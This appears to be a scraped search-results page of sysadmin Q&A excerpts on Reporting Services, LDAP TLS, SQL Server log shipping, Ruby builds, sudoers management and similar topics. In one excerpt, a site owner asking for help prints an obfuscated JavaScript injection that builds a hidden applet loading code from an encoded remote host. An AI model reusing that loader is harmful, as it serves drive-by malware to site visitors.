Search Results

Search found 23044 results on 922 pages for 'oracle solaris 11'.

Page 765/922 | < Previous Page | 761 762 763 764 765 766 767 768 769 770 771 772  | Next Page >

  • Query Execution Failed in Reporting Services reports

    - by Chris Herring
    I have some reporting services reports that talk to Analysis Services and at times they fail with the following error: An error occurred during client rendering. An error has occurred during report processing. Query execution failed for dataset 'AccountManagerAccountManager'. The connection cannot be used while an XmlReader object is open. This occurs sometimes when I change selections in the filter. It also occurs when the machine has been under heavy load and then will consistently error until SSAS is restarted. The log file contains the following error: processing!ReportServer_0-18!738!04/06/2010-11:01:14:: e ERROR: Throwing Microsoft.ReportingServices.ReportProcessing.ReportProcessingException: Query execution failed for dataset 'AccountManagerAccountManager'., ; Info: Microsoft.ReportingServices.ReportProcessing.ReportProcessingException: Query execution failed for dataset 'AccountManagerAccountManager'. ---> System.InvalidOperationException: The connection cannot be used while an XmlReader object is open. at Microsoft.AnalysisServices.AdomdClient.XmlaClient.CheckConnection() at Microsoft.AnalysisServices.AdomdClient.XmlaClient.ExecuteStatement(String statement, IDictionary connectionProperties, IDictionary commandProperties, IDataParameterCollection parameters, Boolean isMdx) at Microsoft.AnalysisServices.AdomdClient.AdomdConnection.XmlaClientProvider.Microsoft.AnalysisServices.AdomdClient.IExecuteProvider.ExecuteTabular(CommandBehavior behavior, ICommandContentProvider contentProvider, AdomdPropertyCollection commandProperties, IDataParameterCollection parameters) at Microsoft.AnalysisServices.AdomdClient.AdomdCommand.ExecuteReader(CommandBehavior behavior) at Microsoft.AnalysisServices.AdomdClient.AdomdCommand.System.Data.IDbCommand.ExecuteReader(CommandBehavior behavior) at Microsoft.ReportingServices.DataExtensions.AdoMdCommand.ExecuteReader(CommandBehavior behavior) at Microsoft.ReportingServices.OnDemandProcessing.RuntimeDataSet.RunDataSetQuery() Can anyone shed light on this issue?

    Read the article

  • ASP.NET AJAX, WebSeal Junctions, and Sessions

    - by powella
    I've run up across a problem with ASP.NET AJAX (hooked up to WebServices directly) and accessing our site through a WebSeal junction. Listing 11. On this page; http://www.ibm.com/developerworks/tivoli/library/t-ajaxtam/index.html explains that requests to pages which do not result in a content type of text/html are not sent with cookie data. Hence, no session. ASP.NET AJAX requests are returned with a content type of "application/json; charset=utf-8". As such, the WebSeal junction is not appending the Session Cookie to the request. This results in our WebService seeing the user as invalid, due to no session information. The Junction has been setup properly with the -J parameter (thats an uppercase J, which appends the required script for WebSeal to the bottom of the page - this prevents forcing IE into quirks mode.) and we've confirmed that the necessary script exists in the output source. I'm up for any suggestions at this point, as I'm out of ideas. FWIW, the site runs perfectly when not accessed through the WebSeal Junction.

    Read the article

  • Ubuntu 12.04 LDAP SSL self-signed cert not accepted

    - by MaddHacker
    I'm working with Ubuntu 12.04, using OpenLDAP server. I've followed the instructions on the Ubuntu help pages and can happily connect without security. To test my connection, I'm using ldapsearch the command looks like: ldapsearch -xv -H ldap://ldap.[my host].local -b dc=[my domain],dc=local -d8 -ZZ I've also used: ldapsearch -xv -H ldaps://ldap.[my host].local -b dc=[my domain],dc=local -d8 As far as I can tell, I've setup my certificate correctly, but no matter why I try, I can't seem to get ldapsearch to accept my self-signed certificate. So far, I've tried: Updating my /etc/ldap/ldap.conf file to look like: BASE dc=[my domain],dc=local URI ldaps://ldap.[my host].local TLS_CACERT /etc/ssl/certs/cacert.crt TLS_REQCERT allow Updating my /etc/ldap.conf file to look like: base dc=[my domain],dc=local uri ldapi:///ldap.[my host].local uri ldaps:///ldap.[my host].local ldap_version 3 ssl start_tls ssl on tls_checkpeer no TLS_REQCERT allow Updating my /etc/default/slapd to include: SLAPD_SERVICES="ldap:/// ldapi:/// ldaps:///" Several hours of Googling, most of which resulted in adding the TLS_REQCERT allow The exact error I'm seeing is: ldap_initialize( ldap://ldap.[my host].local ) request done: ld 0x20038710 msgid 1 TLS certificate verification: Error, self signed certificate in certificate chain TLS: can't connect. ldap_start_tls: Connect error (-11) additional info: error:14090086:SSL routines:SSL3_GET_SERVER_CERTIFICATE:certificate verify failed After several hours of this, I was hoping someone else has seen this issue, and/or knows how to fix it. Please do let me know if I should add more information, or if you need further data.

    Read the article

  • Prosody mod auth external not working

    - by Yang
    I installed mod_auth_external for 0.8.2 on ubuntu 12.04 but it's not working. I have external_auth_command = "/home/yang/chat/testing" but it's not getting invoked. I enabled debug logging and see no messages from that mod. Any help? I'm using the Candy example client. Here's what's written to the log after I submit a login request (and nothing in err log): Oct 24 21:02:43 socket debug server.lua: accepted new client connection from 127.0.0.1:40527 to 5280 Oct 24 21:02:43 mod_bosh debug BOSH body open (sid: %s) Oct 24 21:02:43 boshb344ba85-fbf5-4a26-b5f5-5bd35d5ed372 debug BOSH session created for request from 169.254.11.255 Oct 24 21:02:43 mod_bosh info New BOSH session, assigned it sid 'b344ba85-fbf5-4a26-b5f5-5bd35d5ed372' Oct 24 21:02:43 httpserver debug Sending response to bf9120 Oct 24 21:02:43 httpserver debug Destroying request bf9120 Oct 24 21:02:43 httpserver debug Request has destroy callback Oct 24 21:02:43 socket debug server.lua: closed client handler and removed socket from list Oct 24 21:02:43 mod_bosh debug Session b344ba85-fbf5-4a26-b5f5-5bd35d5ed372 has 0 out of 1 requests open Oct 24 21:02:43 mod_bosh debug and there are 0 things in the send_buffer Oct 24 21:02:43 socket debug server.lua: accepted new client connection from 127.0.0.1:40528 to 5280 Oct 24 21:02:43 mod_bosh debug BOSH body open (sid: b344ba85-fbf5-4a26-b5f5-5bd35d5ed372) Oct 24 21:02:43 mod_bosh debug Session b344ba85-fbf5-4a26-b5f5-5bd35d5ed372 has 1 out of 1 requests open Oct 24 21:02:43 mod_bosh debug and there are 0 things in the send_buffer Oct 24 21:02:43 mod_bosh debug Have nothing to say, so leaving request unanswered for now Oct 24 21:02:43 httpserver debug Request c295d0 left open, on_destroy is function(mod_bosh.lua:81) Here's the config I added: modules_enabled = { ... "bosh"; -- Enable BOSH clients, aka "Jabber over HTTP" ... } authentication = "external" external_auth_protocol = "generic" external_auth_command = "/home/yang/chat/testing"

    Read the article

  • Scripting an automated SQLServer 2008 DR move

    - by ItsAMystery
    Hi All We use the built in logshipping in SQLServer to logship to our DR site but once in a month do a DR test which requires us to move back and forth between our Live and BAckup servers. We run multiple (30) databases on the system so manually backing up the final logs and disabling the jobs is too much work and takes too long. I though no problem, I will script it but have run into trouble with it always complaninig that the final logship is too early to apply even though I dont export the final log until putting the database into norecovery mode. Firstly, does any one no a simple and reliable way of doing this? I have lokoed at some 3rd party software (redgate sqlbackup I think it was) but that didnt make it easy in this situation either. What I want to be able to do is basically run a script (a series of stored procedures) to get me to DR and run another to get me back with no dataloss. My scripts are very simplistic at the moment but here they are: 2 servers Primary Paris Secondary ParisT The StartAgentJobAndWait is a script written by someone else (ta) and just checks the jobs have finished or quits it if it never ends. At the moment I am just using a test database called BOB2 but if I can get it working will pass in the database and job names. from PARIS: /* Disable backup job */ exec msdb..sp_update_job @job_name = 'LSBackup_BOB2', @enabled = 0 exec PARIST.msdb..sp_update_job @job_name = 'LSCopy_PARIS_BOB2', @enabled = 0 exec PARIST.msdb..sp_update_job @job_name = 'LSRestore_PARIS_BOB2', @enabled = 0 exec PARIST.master.dbo.DRStage2 ParisT DRStage2 DECLARE @RetValue varchar (10) EXEC @RetValue = StartAgentJobAndWait LSCopy_PARIS_BOB2 , 2 SELECT ReturnValue=@RetValue if @RetValue = 1 begin print 'The Copy Task completed Succesffuly' END ELSE print 'The Copy task failed, This may or may not be a problem, check restore state of database' SELECT @RetValue = 0 EXEC @RetValue = StartAgentJobAndWait LSRestore_PARIS_BOB2 , 2 SELECT ReturnValue=@RetValue if @RetValue = 1 begin print 'The Restore Task completed Succesffuly' END ELSE print 'The Copy task failed, This may or may not be a problem, check restore state of database' exec PARIS.master.dbo.DRStage3 /* Do the last logship and move it to Trumpington */ BACKUP log "BOB2" to disk='c:\drlogshipping\BOB2.bak' with compression, norecovery EXEC xp_cmdshell 'copy c:\drlogshipping \\192.168.7.11\drlogshipping' EXEC PARIST.master.dbo.DRTransferFinish AS BEGIN restore database "BOB2" from disk='c:\drlogshipping\bob2.bak' with recovery

    Read the article

  • Where can I find linux-kernel-headers-x.x.x.x for SUSE?

    - by Landy
    I'm installing VMware Workstation on a SLED 11 SP1, and the installation is blocked by an error message "Kernel headers for version 2.6.32.27-0.2-default were not found". If you installed them in a non-default path you can specify the path below. Otherwise refer to your distribution's documentation for installation instructions and click Refresh to search again in default locations. The output of rpm -qa | grep kernel is kernel-default-2.6.32.27-0.2.2 kernel-default-base-2.6.32.27-0.2.2 linux-kernel-headers-2.6.32-1.4.13 kernel-default-extra-2.6.32.27-0.2.2 nfs-kernel-server-1.2.1-2.10.1 I had met this issue in Ubuntu and I installed the required linux header via apt-get then the issue disappeared. But in SLED, I didn't find the rpm package in SUSE's software repository, and I also google "linux-kernel-headers-2.6.32.27" but did not match any documents. Any suggestion will be highly appreciated. Thanks. The output result of zypper se kernel | grep kernel is i | linux-kernel-headers | Linux Kernel Headers | package | linux-kernel-headers | Linux Kernel Headers | srcpackage

    Read the article

  • VSS Post Backup failures for Virtual Server 2005 R2 SP1 virtual machines

    - by califguy4christ
    We've been seeing strange errors with Volume Shadow Copy services on our Virtual Server 2005 R2 SP1 host. It appears to be failing on a strange mountpoint in the C:\WINDOWS\Temp\ folders, which I believe is used by VSS to mount a writeable image file. To summarize: The Microsoft Virtual Server 2005 Writer continually goes into a failed retryable state The Virtual Server log reports errors during the Post Backup phase VSS reports errors backing up a mount point of unknown origins The mount point causes NTFS and ftdisk errors The host is x86 Windows Server 2003 Standard, SP2. The virtual machine is the same. Both use basic disks. Here is the writer state: Writer name: 'Microsoft Virtual Server 2005 Writer' Writer Id: {76afb926-87ad-4a20-a50f-cdc69412ddfc} Writer Instance Id: {78df98e2-bf19-4804-890b-15865efef3bd} State: [11] Failed Last error: Retryable error From the Virtual Server log: Virtual Server - Vss Writer - Event ID: 1035: The VSS writer for Virtual Server failed during the PostBackup phase. The guest shadow copies did not get exposed on the host machine, after mounting all the virtual hard disks of the virtual machine VMACHINE. From the Application log: VSS - None - Event ID: 12290: Volume Shadow Copy Service warning: GetVolumeInformationW( \\?\Volume{fb84bae7-87f5-11dd-9832-001cc4961ca6}\,NULL,0, NULL,NULL,[0x00000000], , 260) == 0x0000045d. hr = 0x00000000. From the System log: Ntfs - Disk - Event ID: 55: The file system structure on the disk is corrupt and unusable. Please run the chkdsk utility on the volume C:\WINDOWS\Temp\ {fb84bae7-87f5-11dd-9832-001cc49.... My current theory is that VSS creates a mount point for an image file of the VHD, then the software panics for some reason, leaving everything in an inconsistent state. Removing the mount point doesn't resolve the problem. All of the other disks check out fine with CHKDSK. There's no exclusion option for VHDs or to turn off online backups. Has anyone seen this kind of thing before or point me in the right direction for getting more information about the mount point and it's origins? I haven't been able to trace what application is creating that mount point.

    Read the article

  • gzip specific files

    - by byTheDrop
    for some reason these files are not gzipping on my apache server, chrome network tab shows this. Is there a specific directive I can add to htaccess to cache these files? Compressing the following resources with gzip could reduce their transfer size by about two thirds (~680.45KB): adae8bc4c3cb52cbe22358aaced87a72.css could save ~607B css_f91fa8d73b5e7661d6dcf9e58395e533.css could save ~59.54KB jquery.min.js could save ~37.27KB drupal.js could save ~6.15KB auto_image_handling.js could save ~6.72KB lightbox.js could save ~29.38KB superfish.js could save ~2.42KB jquery.bgiframe.min.js could save ~1011B jquery.hoverIntent.minified.js could save ~1.05KB nice_menus.js could save ~581B panels.js could save ~531B jquery.pngFix.js could save ~2.98KB jquery.cycle.all.min.js could save ~20.20KB views_slideshow.js could save ~8.76KB views_slideshow.js could save ~9.02KB wanderlust_custom_videos.js could save ~598B wl_helper.js could save ~777B extlink.js could save ~2.88KB cufon-yui.js could save ~11.89KB googleanalytics.js could save ~1.48KB swfobject.js could save ~6.65KB jquery.jcarousel.min.js could save ~10.19KB jcarousel.js could save ~6.01KB Akzidenz_Grotesk_BE_Super_800.font.js could save ~14.27KB Akzidenz_Grotesk_BE_Bold_700.font.js could save ~12.96KB Akzidenz_Grotesk_BE_Cn_400.font.js could save ~13.39KB SuperCondensed_500.font.js could save ~24.40KB FuturaBold_700.font.js could save ~26.19KB Futura_500.font.js could save ~57.70KB SuperGroteskB_500.font.js could save ~23.86KB jquery.cookie.js could save ~1.25KB wanderlust.js could save ~1.69KB sliderbottom.js could save ~442B jcarousellite_1.0.1.min.js could save ~4.60KB jcarousellite_control.js could save ~224B sitesdropdown.js could save ~1.09KB widgets.js could save ~50.13KB cufon-drupal.js could save ~599B swfobject_api.js could save ~348B ga.js could save ~24.02KB all.js could save ~124.67KB tweet_button.1347008535.html could save ~38.43KB xd_arbiter.php could save ~16.80KB xd_arbiter.php could save ~16.80KB

    Read the article

  • Ext3 fs: Block bitmap for group 1 not in group (block 0). is fs dead?

    - by ip
    Hi, My company has a server with one big partition with Mysql database and php files. Now this partition seems to be corrupted, as reported from kernel messages when I tried to mount it manually: [329862.817837] EXT3-fs error (device loop1): ext3_check_descriptors: Block bitmap for group 1 not in group (block 0)! [329862.817846] EXT3-fs: group descriptors corrupted! I've tried to recovery it running tools from a PLD livecd. These are the tools I have tested: - e2retrieve - testdisk - photorec - dd_rescue/dd_rhelp - ddrescue - fsck.ext2 - e2salvage without any success. dumpe2fs 1.41.3 (12-Oct-2008) Filesystem volume name: /dev/sda3 Last mounted on: <not available> Filesystem UUID: dd51610b-6de0-4392-a6f3-67160dbc0343 Filesystem magic number: 0xEF53 Filesystem revision #: 1 (dynamic) Filesystem features: has_journal filetype sparse_super Default mount options: (none) Filesystem state: not clean with errors Errors behavior: Continue Filesystem OS type: Linux Inode count: 9502720 Block count: 18987570 Reserved block count: 949378 Free blocks: 11555345 Free inodes: 11858398 First block: 0 Block size: 4096 Fragment size: 4096 Blocks per group: 32768 Fragments per group: 32768 Inodes per group: 16384 Inode blocks per group: 512 Last mount time: Wed Mar 24 09:31:03 2010 Last write time: Mon Apr 12 11:46:32 2010 Mount count: 10 Maximum mount count: 30 Last checked: Thu Jan 1 01:00:00 1970 Check interval: 0 (<none>) Reserved blocks uid: 0 (user root) Reserved blocks gid: 0 (group root) First inode: 11 Inode size: 128 Journal inode: 8 Journal backup: inode blocks dumpe2fs: A block group is missing an inode table while reading journal inode There's any other tools I have to test before considering these disk definitely unrecoverable? Many thanks, ip

    Read the article

  • Office Communicator and cannot sync Address book error

    - by Noah
    We are trying to get OCS 2007 R2 up and running. The clients login fine, but when I let it sit for a while, we still get the address book sync error message of: "Cannot synchronize with the corporate address book. This may be because the proxy server setting in your web browser does not allow access to the address book. If the problem persists, contact your system administrator". When I try and download the file locally, this error comes up: Could not load file or assembly 'ABServerHttpHandler, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35' or one of its dependencies. Failed to grant minimum permission requests. (Exception from HRESULT: 0x80131417) I googled and came across this post (http://social.technet.microsoft.com/Forums/en/ocsaddressbook/thread/c28ff2d8-66a4-456c-a5ad-e445a667e8ed) which suggests removing and reinstalling .NET 2.0 but that didn't seem to resolve the issue either. When we run abserver.exe -validateDB it works properly. We even tried the suggestion from Greg's Blog (http://blogs.technet.com/greganth/archive/2009/03/11/office-communicator-notifications-cannot-synchronize-address-book.aspx) about restarting the web component services but that didn't work either. Still seeing the same issue. So does anyone have an idea of where we go from here?

    Read the article

  • Can't compile CentOS 5, Ruby 1.9.2 and OpenSSL 1.0.0c

    - by pstinnett
    I'm trying to install Ruby 1.9.2 on CentOS 5.5. I get through most of the make process, but when it tries to compile OpenSSL I get an error. Below is the errror outputted: compiling openssl make[1]: Entering directory `/sources/ruby-1.9.2-p136/ext/openssl' gcc -I. -I../../.ext/include/x86_64-linux -I../.././include -I../.././ext/openssl -DRUBY_EXTCONF_H=\"extconf.h\" -fPIC -O3 -ggdb -Wextra -Wno-unused-parameter -Wno-parentheses -Wpointer-arith -Wwrite-strings -Wno-missing-field-initializers -Wno-long-long -o ossl_x509.o -c ossl_x509.c In file included from ossl.h:201, from ossl_x509.c:11: openssl_missing.h:71: error: conflicting types for ‘HMAC_CTX_copy’ /usr/include/openssl/hmac.h:102: error: previous declaration of ‘HMAC_CTX_copy’ was here openssl_missing.h:95: error: conflicting types for ‘EVP_CIPHER_CTX_copy’ /usr/include/openssl/evp.h:459: error: previous declaration of ‘EVP_CIPHER_CTX_copy’ was here make[1]: *** [ossl_x509.o] Error 1 make[1]: Leaving directory `/sources/ruby-1.9.2-p136/ext/openssl' make: *** [mkmain.sh] Error 1 Any help would be greatly appreciated! I'm not a master at Linux by any means, but I was able to successfully install this version of Ruby on our dev server. Our live server is running a newer version of OpenSSL which I'm assuming is why it's breaking. Just not sure what the fix is!

    Read the article

  • How do I enable the confluence-users group?

    - by M. Joanis
    I've got an issue with Atlassian Confluence. Normal users can't log in, but administrators can... Details below! I manage users using an Apple Open Directory (LDAP). I created two groups: "confluence-administrators" and "confluence-users". I've added team leaders and managers to both groups, and I've added some users to "confluence-users". Everyone in "confluence-administrators" can log in easily. People in "confluence-users" can't log in at all. When I look at the user list (in Confluence), and select a user to examine the list of groups he or she belongs to, I can see that the Confluence Administrators are indeed members of the "confluence-administrators" group, but not a single user is a member of the "confluence-users" group. Not event the Confluence Administrators, which are members of both groups! So I tried to have one of the "confluence-users" log in while watching the Confluence logs. Here's the result: 2012-07-05 14:50:19,698 ERROR [http-8090-11] [core.event.listener.AutoGroupAdderListener] handleEvent Could not auto add user to group: Group <confluence-users> is read-only and cannot be updated at com.atlassian.crowd.directory.DbCachingRemoteDirectory.addUserToGroup(DbCachingRemoteDirectory.java:461) ... So it says the group group is read-only... I'm not sure why it is a problem. Well confluence-administrators too is read-only and it doesn't complain. Some things I don't think are part of the problem: I've synchronized Confluence with LDAP many, many times. I have verified many times that I didn't make a typo while setting the groups on the LDAP server. LDAP synchronization goes well. No errors in the logs (only INFO level log messages). The user exists. Errors in the logs are different when a user doesn't exist. Any help is most welcome!

    Read the article

  • What is causing random hard freezes on my system? Kaspersky?

    - by Christian Ivicevic
    The last few weeks I experienced a new strange behavior of my computer. Sometimes Windows 7 just freezes with no real reason at all. While listening to music for example the playback hangs and you can hear a very nasty sound. Neither mouse nor keyboard input is handled and everything is just stuck. Using Ubuntu this does not happen, so I think it is just a matter of driver issues or a Windows 7 bug. Furthermore I am really suspicious about Kaspersky (Internet Security 11) and so I let it perform a complete virus scan while no other app is running. At about 50% it happened again and I needed to restart the computer by holding the power button the bad way... A really weird thing is that playing Skyrim this happened once, however music playback did not stop. Only the framerate dropped to 0 and sometimes for a few seconds I am able to move. Therefore I am really confused as furthermore no bluescreen pops up. Memtest told me that everything seems to be alright... Can anyone explain me which data you need about my hardware and software (and which tools tools to use to gather the informatik) to be able to provide any help on my problem?

    Read the article

  • "Windows detected a hard drive" issue in Windows 7 x64

    - by Jasiu
    I upgraded to the OCZ-Agility3 120GB from a 60 OCZ Vertex2 SSD. I cloned the drive from the Vertex to the new Agility. Everything seemed to have gone well and have not had any problems. Recently in the passed month I have gotten this error: I downloaded teh OCZToolboxMP and ran the SMART utility and don't see anything wrong: SMART READ DATA ModelNumber : OCZ-AGILITY3 Serial Number : OCZ-Y1945X77438P4NU6 WWN : 5-e8-3a-97 ebea5ba76 Revision: 10 Attributes List 1: SSD Raw Read Error Rate Normalized Rate: 70 total ECC and RAISE errors 5: SSD Retired Block Count Reserve blocks remaining: 100% 9: SSD Power-On Hours Total hours power on: 968 12: SSD Power Cycle Count Count of power on/off cycles: 28 171: SSD Program Fail Count Total number of Flash program operation failures: 0 172: SSD Erase Fail Count Total number of Flash erase operation failures: 0 174: SSD Unexpected power loss count Total number of unexpected power loss: 11 177: SSD Wear Range Delta Delta between most-worn and least-worn Flash blocks: 0 181: SSD Program Fail Count Total number of Flash program operation failures: 0 182: SSD Erase Fail Count Total number of Flash erase operation failures: 0 187: SSD Reported Uncorrectable Errors Uncorrectable RAISE errors reported to the host for all data access: 4145 194: SSD Temperature Monitoring Current: 30 High: 30 Low: 30 195: SSD ECC On-the-fly Count Normalized Rate: 120 196: SSD Reallocation Event Count Total number of reallocated Flash blocks: 100 201: SSD Uncorrectable Soft Read Error Rate Normalized Rate: 120 204: SSD Soft ECC Correction Rate (RAISE) Normalized Rate: 120 230: SSD Life Curve Status Current state of drive operation based upon the Life Curve: 100 231: SSD Life Left Approximate SDD life Remaining: 100% 241: SSD Lifetime writes from host lifetime writes 893 GB 242: SSD Lifetime reads from host lifetime reads 968 GB Does anyone have any ideas of what might be wrong and or how I can go about fixing this? Please let me know if there is other information I can provide. Thanks for your help Windows 7 x64 SP1 AMD Phenom II X4 940 8GB RAM

    Read the article

  • iPod touch has extremely slow wifi, drops packets - only on my router

    - by mskfisher
    I just purchased an iPod Touch. I am having a lot of trouble with its speeds on my Tenda W311R, but it has no speed problems on my neighbor's Netgear router. It will connect and authenticate to my network, but the Speed Test app from speedtest.net shows rates near 20-50 kbps. If I run the speed test immediately after powering the iPod on, it will get speeds of 10-20 Mbps, like it should - but the speeds slow down to the kbps range abut 10-15 seconds afterward. I get the same behavior with encryption and without encryption, and regardless of N, G, or B compatibility settings in the router. I've tried rebooting the iPod and resetting the network settings, but it's still slow. I've tried pinging the iPod from another computer, and it shows about 40% packet loss: $ ping 192.168.0.111 PING 192.168.0.111 (192.168.0.111): 56 data bytes 64 bytes from 192.168.0.111: icmp_seq=0 ttl=64 time=14.188 ms 64 bytes from 192.168.0.111: icmp_seq=1 ttl=64 time=11.556 ms 64 bytes from 192.168.0.111: icmp_seq=2 ttl=64 time=5.675 ms 64 bytes from 192.168.0.111: icmp_seq=3 ttl=64 time=5.721 ms Request timeout for icmp_seq 4 64 bytes from 192.168.0.111: icmp_seq=5 ttl=64 time=6.491 ms Request timeout for icmp_seq 6 64 bytes from 192.168.0.111: icmp_seq=7 ttl=64 time=8.065 ms Request timeout for icmp_seq 8 Request timeout for icmp_seq 9 Request timeout for icmp_seq 10 64 bytes from 192.168.0.111: icmp_seq=11 ttl=64 time=9.605 ms Signal strength is good - I'm never more than 20 feet from my access point, and it exhibits the same behavior if I'm standing next to the router. It works just well enough to receive text, but videos don't work at all. App downloads are hit and miss. I've tweaked just about all of the settings I can see to tweak, and I'm at a loss. I have also been searching Google for the past three days, all to no avail. Any suggestions?

    Read the article

  • Why apache doesn't restart after configuring SSL?

    - by poz2k4444
    I've installed apache2 and then configure it to work with SSL following this and this tutorials, the problem becomes when I try to restart the service, the following error throws: (98)Address already in use: make_sock: could not bind to address 0.0.0.0:443 no listening sockets available, shutting down Unable to open logs the output of netstat -anp | grep 443 just display firefox listening and anything else, how could I solve this and get the service running?? The ouput of ps -Af|grep <firefox PID> is: root 1949 1 11 18:42 tty1 00:20:55 /opt/firefox/firefox-bin root 2025 1949 4 18:43 tty1 00:08:39 /opt/firefox/plugin-container /root/.mozilla/plugins/libflashplayer.so -greomni /opt/firefox/omni.ja 1949 true plugin after closing firefox and then cheking again for port 443 the output is: tcp 0 0 10.32.208.179:38923 74.125.139.155:443 TIME_WAIT - tcp 0 0 10.32.208.179:45706 74.125.139.113:443 TIME_WAIT - tcp 0 0 10.32.208.179:40456 74.125.139.156:443 TIME_WAIT - tcp 0 0 10.32.208.179:56823 69.171.227.62:443 FIN_WAIT2 - unix 3 [ ] STREAM CONNECTED 12443 1721/dbus-daemon @/tmp/dbus-8ee35rmOOS Seeing the error logs, which are not at the time when I'm doing this, the last errors are: [Tue Oct 02 18:41:54 2012] [error] Init: Unable to read server certificate from file /etc/apache2/ssl/sever.crt [Tue Oct 02 18:41:54 2012] [error] SSL Library Error: 218529960 error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong tag [Tue Oct 02 18:41:54 2012] [error] SSL Library Error: 218595386 error:0D07803A:asn1 encoding routines:ASN1_ITEM_EX_D2I:nested asn1 error

    Read the article

  • Malware Cross Site Scriptinig attack / XSS Attack?

    - by user124176
    I have been hit by an Cross Site Scripting / XSS / RFI Attack, where I cant find it anywhere in the source of the files and Hashes on files have not been changed according to OSSEC HIDS that I run real time monitoring on all webdirs. The Attack happens on IE9 Only it and appends java script code like beneath, notice that it starts after /html tag closes normally. : scXXpt language="javascXXpt"var enuwjo = function(gqumas, yhxxju, zbkpilf, xzzvhld){var xew = function(iso) {var crh, eaq, i; var owb=""; crh = iso.length; for (i = 0; i < crh; ++i) {eaq = iso.charCodeAt(i)-2;owb = owb + String.fromCharCode(eaq);} return(owb); } var janlq=document.createElement(xew("crrngv"));janlq.setAttribute(xew("eqfg"), xew(gqumas));janlq.setAttribute(xew("ctejkxg"), xew("jvvr<11"+yhxxju));janlq.setAttribute(xew("ykfvj"), "1");janlq.setAttribute(xew("jgkijv"), "1");var lgtwyi=document.createElement(xew("rctco"));lgtwyi.setAttribute(xew("pcog"),xew(zbkpilf));lgtwyi.setAttribute(xew("xcnwg"),xew(xzzvhld));janlq.appendChild(lgtwyi);document.body.appendChild(janlq); } ; enuwjo("vxfgwtogg0dcrcmnwe0encuu","g{g0o{yge{0kp129;5","mlit{ttmdttponfhrrexihpe","fh;ccfe:85:5d9872;2;f569276h5268ff9;34:25;7d:8:7h8c68777;;822c73"); No code has been changed on file as far as my HIDS says ... but I can see in my Error log, the following... File does not exist: /var/www/vhosts/superkids.dk/ggtest/tvdeurmee In the Access log, the following IP - - [09/Jun/2012:23:30:13 +0200] "GET /tvdeurmee/bapakluc.class HTTP/1.1" 404 504 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_04" IP - - [09/Jun/2012:23:30:13 +0200] "GET /tvdeurmee/bapakluc/class.class HTTP/1.1" 404 509 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_04" Now... the folder or path /tvdeurmee/bapakluc/ does not exist on the server in question, nor does the Java Class class.class, yet it still looks like an local call to the server and it was getting an "404 File not found / 504 Gateway Timeout" (attack was blocked by local machine, hence the timeout / not found) Any idea on how to prevent the attack ? Im working on using HTML Purifier, but that might not be the correct idea it seems, according to some replies im getting on their forum :) Kind regards, Steven

    Read the article

  • User can't SFTP after chroot

    - by Dauntless
    Ubuntu 10.04.4 LTS I'm trying to chroot the user 'sam'. According to all the tutorials out there this should work, but apparently I'm still doing something wrong. The user: sam:x:1005:1006::/home/sam:/bin/false I changed /etc/ssh/sshd_config like this (at the bottom of the file): #Subsystem sftp /usr/lib/openssh/sftp-server # CHROOT JAIL Subsystem sftp internal-sftp Match group users ChrootDirectory %h ForceCommand internal-sftp AllowTcpForwarding no I added sam to the users group: $groups sam sam : sam users I changed the permissions for sam's home folder: $ ls -la /home/sam drwxr-xr-x 11 root root 4096 Sep 23 16:12 . drwxr-xr-x 8 root root 4096 Sep 22 16:29 .. drwxr-xr-x 2 sam users 4096 Sep 23 16:10 awstats drwxr-xr-x 3 sam users 4096 Sep 23 16:10 etc ... drwxr-xr-x 2 sam users 4096 Sep 23 16:10 homes drwxr-x--- 3 sam users 4096 Sep 23 16:10 public_html I restarted ssh and now sam can't log in with SFTP. The session is created, but also closed immediately: Sep 24 12:55:15 ... sshd[9917]: Accepted password for sam from ... Sep 24 12:55:15 ... sshd[9917]: pam_unix(sshd:session): session opened for user sam by (uid=0) Sep 24 12:55:16 ... sshd[9928]: subsystem request for sftp Sep 24 12:55:17 ... sshd[9917]: pam_unix(sshd:session): session closed for user sam Cyberduck says Unexpected end of sftp stream. and other clients give similar errors. What did I forget / what is going wrong? Thanks!

    Read the article

  • Ingress filtering in Linux traffic control: Redirect traffic to IFB device

    - by Dani Camps
    I have an openwrt router and I want to shape incoming traffic in order to classify all the traffic addressed to a certain IP address in my home network as low priority. For that purpose I want to redirect all traffic incoming to the eth1 interface, the one connected to the DSL modem, to an IFB device where I will do the shaping. These are the details of my system: Linux OpenWrt 2.6.32.27 #7 Fri Jul 15 02:43:34 CEST 2011 mips GNU/Linux Here is the script I am using where the last instruction is failing: # Variable definition ETH=eth1 IFB=ifb1 IP_LP="192.168.1.22/32" DL_RATE="900kbps" HP_RATE="890kbps" LP_RATE="10kbps" TC="tc" # Configuring the ifbX interface insmod ifb insmod sch_htb insmod sch_ingress ifconfig $IFB up # Adding the HTB scheduler to the ingress interface $TC qdisc add dev $IFB root handle 1: htb default 11 # Set the maximum bandwidth that each priority class can get, and the maximum borrowing they can do $TC class add dev $IFB parent 1:1 classid 1:10 htb rate $LP_RATE ceil $DL_RATE $TC class add dev $IFB parent 1:1 classid 1:11 htb rate $HP_RATE ceil $DL_RATE # Redirect all ingress traffic arriving at $ETH to $IFB $TC qdisc del dev $ETH ingress 2>/dev/null $TC qdisc add dev $ETH ingress $TC filter add dev $ETH parent ffff: protocol ip prio 1 u32 \ match u32 0 0 flowid 1:1 \ action mirred egress redirect dev $IFB The last instruction fails with: Action 4 device ifb1 ifindex 9 RTNETLINK answers: No such file or directory We have an error talking to the kernel Does anyone know what am I doing wrong ? Best Regards Daniel

    Read the article

  • How to generate customized sudoers files in puppet depending on the environment they're deployed to?

    - by gozu
    the sysadmins are present in the sudoers files of all environments, but other sudoers are not. Different environments all have slightly different sudoers. Most of the time, 90% of users are the same, and 10% vary so we cannot have only one sudoers file for everything. Right now, we are using puppet with 10 different files with names like sudoers.production1, sudoers.production2, sudoers.production3, sudoers.testing1, sudoers.staging1 and so forth. Puppet then picks the file to deploy based on the server's $domain (ex: dbserver.staging1.acme.com) or $hardwaremodel. It works fine but it's a nightmare to maintain so many files. I'd like to autogenerate sudoers files based on the server's domain and have only one big file with all the sudoers permissions for all users and all environments. Something that looks like: User_Alias ADMINS = abe, bob, carol, dave case $domain { "staging1.acme.com" { #add dev1,dev2,tester1,tester2 to sudoers file } "testing2.acme.com" { #add tester1, tester3, tester4 to sudoers file } What's the best way to go about this? Suggestions for alternatives are welcome. I'd appreciate any tips. Update 1: For security reasons, we'd rather 